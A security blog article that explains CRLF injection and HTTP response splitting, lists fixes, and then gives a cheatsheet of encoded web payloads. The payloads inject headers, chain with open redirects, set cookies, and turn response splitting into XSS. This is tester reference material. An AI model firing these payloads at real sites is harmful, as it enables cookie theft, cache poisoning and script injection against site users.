CRLF Injection Define

CRLF Injection
CRLF Injection

CRLF Injection defines as CR (Carriage Return) and LF (Line Feed).

CRLF Injection is a one of types of Web injection attacks. By exploiting the CRLF injection flaw in an HTTP response.

They’re used to note the termination of a line, however, dealt with differently in today’s popular Operating Systems.

For example:

In Windows both a CR and LF are required to note the end of a line, whereas in Linux/UNIX a LF is only required. In the HTTP protocol, the CR-LF sequence is always used to terminate a line.

Cyber attackers can modify the application data, compromising integrity and enabling the exploitation of another vulnerabilities such as Cross Site Scripting (XSS), Web Page injection, Web server cache poisoning, Website defacement and more.

A CRLF Injection attack occurs when a user manages to submit a CRLF into an application. This is most commonly done by modifying an HTTP parameter or URL.

Also Read: Javascript Injection Impact

How To Fix?

  • You should always use a function to encode the CR and LF special characters.
  • Strip any newline characters before passing content into the HTTP header.
  • Encode the data that you pass into HTTP headers. This will effectively scramble the CR and LF codes if the attacker attempts to inject them.

CRLF Injection Cheatsheet

CRLF Injection || HTTP Response Splitting

%0dSet-Cookie:csrf_token=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx;

 

Header-based test, site root

%0d%0aheader:header
%0aheader:header
%0dheader:header
%23%0dheader:header
%3f%0dheader:header
/%250aheader:header
/%25250aheader:header
/%%0a0aheader:header
/%3f%0dheader:header
/%23%0dheader:header
/%25%30aheader:header
/%25%30%61header:header
/%u000aheader:header

 

CRLF chained with Open Redirect server misconfiguration

Note: This sometimes works. (Discovered in some Yandex sites, was not exploitable from the root.)

//www.google.com/%2f%2e%2e%0d%0aheader:header
/www.google.com/%2e%2e%2f%0d%0aheader:header
/google.com/%2F..%0d%0aheader:header

 

CRLF Injection to XSS

%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2e%2e

 

Response splitting on 302 Redirect, before Location header (Discovered in DoD)

%0d%0aContent-Type:%20text%2fhtml%0d%0aHTTP%2f1.1%20200%20OK%0d%0aContent-Type:%20text%2fhtml%0d%0a%0d%0a%3Cscript%3Ealert('XSS');%3C%2fscript%3E

 

Response splitting on 301 code, chained with Open Redirect to corrupt location header and to break 301 by @black2fan (Facebook bug)

Note: xxx:1 was used for breaking open redirect destination (Location header). Great example how of to escalate CRLF to XSS on a such, it would seem, unexploitable 301 status code.

%2Fxxx:1%2F%0aX-XSS-Protection:0%0aContent-Type:text/html%0aContent-Length:39%0a%0a%3cscript%3ealert(document.cookie)%3c/

 

Source:
Owasp, GitHub
For the latest update about Cyber and Infosec World, follow us on Twitter, Facebook, Telegram , Instagram and subscribe to our YouTube Channel.

Subscribe to HackersOnlineClub via Email

Enter your Email address to receive notifications of Latest Posts by Email | Join over Million Followers

More from Priyanshu Sahay

Telegram Adds New Privacy Feature With Anonymous Message Forwarding

Telegram is a cloud-based instant messaging and voice over IP service. In...
Read More

Leave a Reply